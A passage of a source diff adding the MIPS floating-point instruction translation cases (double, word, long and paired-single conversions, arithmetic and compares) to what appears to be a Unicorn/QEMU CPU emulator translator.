gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_chs_d(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "neg.d"; + break; + case OPC_ROUND_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_roundl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "round.l.d"; + break; + case OPC_TRUNC_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_truncl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "trunc.l.d"; + break; + case OPC_CEIL_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_ceill_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "ceil.l.d"; + break; + case OPC_FLOOR_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_floorl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "floor.l.d"; + break; + case OPC_ROUND_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_roundw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "round.w.d"; + break; + case OPC_TRUNC_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_truncw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "trunc.w.d"; + break; + case OPC_CEIL_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_ceilw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "ceil.w.d"; + break; + case OPC_FLOOR_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_floorw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "floor.w.d"; + break; + case OPC_SEL_D: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_d(ctx, op1, fd, ft, fs); + opn = "sel.d"; + break; + case OPC_SELEQZ_D: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_d(ctx, op1, fd, ft, fs); + opn = "seleqz.d"; + break; + case OPC_SELNEZ_D: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_d(ctx, op1, fd, ft, fs); + opn = "selnez.d"; + break; + case OPC_MOVCF_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_movcf_d(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); + opn = "movcf.d"; + break; + case OPC_MOVZ_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[ft], 0, l1); + } + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + opn = "movz.d"; + break; + case OPC_MOVN_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + } + opn = "movn.d"; + break; + case OPC_RECIP_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_recip_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip.d"; + break; + case OPC_RSQRT_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rsqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt.d"; + break; + case OPC_MADDF_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fd); + gen_helper_float_maddf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "maddf.d"; + } + break; + case OPC_MSUBF_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fd); + gen_helper_float_msubf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "msubf.d"; + } + break; + case OPC_RINT_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rint_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "rint.d"; + } + break; + case OPC_CLASS_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_class_d(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "class.d"; + } + break; + case OPC_MIN_D: /* OPC_RECIP2_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MIN_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_min_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "min.d"; + } else { + /* OPC_RECIP2_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_recip2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip2.d"; + } + break; + case OPC_MINA_D: /* OPC_RECIP1_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MINA_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_mina_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "mina.d"; + } else { + /* OPC_RECIP1_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_recip1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip1.d"; + } + break; + case OPC_MAX_D: /* OPC_RSQRT1_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAX_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_max_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "max.d"; + } else { + /* OPC_RSQRT1_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rsqrt1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt1.d"; + } + break; + case OPC_MAXA_D: /* OPC_RSQRT2_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAXA_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_maxa_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "maxa.d"; + } else { + /* OPC_RSQRT2_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_rsqrt2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt2.d"; + } + break; + case OPC_CMP_F_D: + case OPC_CMP_UN_D: + case OPC_CMP_EQ_D: + case OPC_CMP_UEQ_D: + case OPC_CMP_OLT_D: + case OPC_CMP_ULT_D: + case OPC_CMP_OLE_D: + case OPC_CMP_ULE_D: + case OPC_CMP_SF_D: + case OPC_CMP_NGLE_D: + case OPC_CMP_SEQ_D: + case OPC_CMP_NGL_D: + case OPC_CMP_LT_D: + case OPC_CMP_NGE_D: + case OPC_CMP_LE_D: + case OPC_CMP_NGT_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + if (ctx->opcode & (1 << 6)) { + gen_cmpabs_d(ctx, func-48, ft, fs, cc); + opn = condnames_abs[func-48]; + } else { + gen_cmp_d(ctx, func-48, ft, fs, cc); + opn = condnames[func-48]; + } + break; + case OPC_CVT_S_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_cvts_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "cvt.s.d"; + break; + case OPC_CVT_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_cvtw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "cvt.w.d"; + break; + case OPC_CVT_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.l.d"; + break; + case OPC_CVT_S_W: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_cvts_w(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.s.w"; + break; + case OPC_CVT_D_W: + check_cp1_registers(ctx, fd); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_cvtd_w(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.d.w"; + break; + case OPC_CVT_S_L: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_cvts_l(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "cvt.s.l"; + break; + case OPC_CVT_D_L: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtd_l(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.d.l"; + break; + case OPC_CVT_PS_PW: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtps_pw(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.ps.pw"; + break; + case OPC_ADD_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_add_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "add.ps"; + break; + case OPC_SUB_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_sub_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sub.ps"; + break; + case OPC_MUL_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_mul_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mul.ps"; + break; + case OPC_ABS_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_abs_ps(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "abs.ps"; + break; + case OPC_MOV_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mov.ps"; + break; + case OPC_NEG_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_chs_ps(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "neg.ps"; + break; + case OPC_MOVCF_PS: + check_cp1_64bitmode(ctx); + gen_movcf_ps(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); + opn = "movcf.ps"; + break; + case OPC_MOVZ_PS: + check_cp1_64bitmode(ctx); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + + if (ft != 0) + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + opn = "movz.ps"; + break; + case OPC_MOVN_PS: + check_cp1_64bitmode(ctx); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + } + opn = "movn.ps"; + break; + case OPC_ADDR_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, ft); + gen_load_fpr64(ctx, fp1, fs); + gen_helper_float_addr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "addr.ps"; + break; + case OPC_MULR_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, ft); + gen_load_fpr64(ctx, fp1, fs); + gen_helper_float_mulr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mulr.ps"; + break; + case OPC_RECIP2_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_recip2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip2.ps"; + break; + case OPC_RECIP1_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_recip1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip1.ps"; + break; + case OPC_RSQRT1_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rsqrt1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt1.ps"; + break; + case OPC_RSQRT2_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_rsqrt2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt2.ps"; + break; + case OPC_CVT_S_PU: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + gen_helper_float_cvts_pu(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.s.pu"; + break; + case OPC_CVT_PW_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtpw_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.pw.ps"; + break; + case OPC_CVT_S_PL: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_cvts_pl(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.s.pl"; + break; + case OPC_PLL_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_store_fpr32h(ctx, fp0, fd); + gen_store_fpr32(ctx, fp1, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "pll.ps"; + break; + case OPC_PLU_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32h(ctx, fp1, ft); + gen_store_fpr32(ctx, fp1, fd); + gen_store_fpr32h(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "plu.ps"; + break; + case OPC_PUL_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_store_fpr32(ctx, fp1, fd); + gen_store_fpr32h(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "pul.ps"; + break; + case OPC_PUU_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + gen_load_fpr32h(ctx, fp1, ft); + gen_store_fpr32(ctx, fp1, fd); + gen_store_fpr32h(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "puu.ps"; + break; + case OPC_CMP_F_PS: + case OPC_CMP_UN_PS: + case OPC_CMP_EQ_PS: + case OPC_CMP_UEQ_PS: + case OPC_CMP_OLT_PS: + case OPC_CMP_ULT_PS: + case OPC_CMP_OLE_PS: + case OPC_CMP_ULE_PS: + case OPC_CMP_SF_PS: + case OPC_CMP_NGLE_PS: + case OPC_CMP_SEQ_PS: + case OPC_CMP_NGL_PS: + case OPC_CMP_LT_PS: + case OPC_CMP_NGE_PS: + case OPC_CMP_LE_PS: + case OPC_CMP_NGT_PS: + if (ctx->opcode & (1 << 6)) { + gen_cmpabs_ps(ctx, func-48, ft, fs, cc); + opn = condnames_abs[func-48]; + } else { + gen_cmp_ps(ctx, func-48, ft, fs, cc); + opn = condnames[func-48]; + } + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + return; + } + (void)opn; /* avoid a compiler warning */ + switch (optype) { + case BINOP: + MIPS_DEBUG("%s %s, %s, %s", opn, fregnames[fd], fregnames[fs], fregnames[ft]); + break; + case CMPOP: + MIPS_DEBUG("%s %s,%s", opn, fregnames[fs], fregnames[ft]); + break; + default: + MIPS_DEBUG("%s %s,%s", opn, fregnames[fd], fregnames[fs]); + break; + } +} + +/* Coprocessor 3 (FPU) */ +static void gen_flt3_ldst (DisasContext *ctx, uint32_t opc, + int fd, int fs, int base, int index) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "extended float load/store"; + int store = 0; + TCGv t0 = tcg_temp_new(tcg_ctx); + + if (base == 0) { + gen_load_gpr(ctx, t0, index); + } else if (index == 0) { + gen_load_gpr(ctx, t0, base); + } else { + gen_op_addr_add(ctx, t0, *cpu_gpr[base], *cpu_gpr[index]); + } + /* Don't do NOP if destination is zero: we 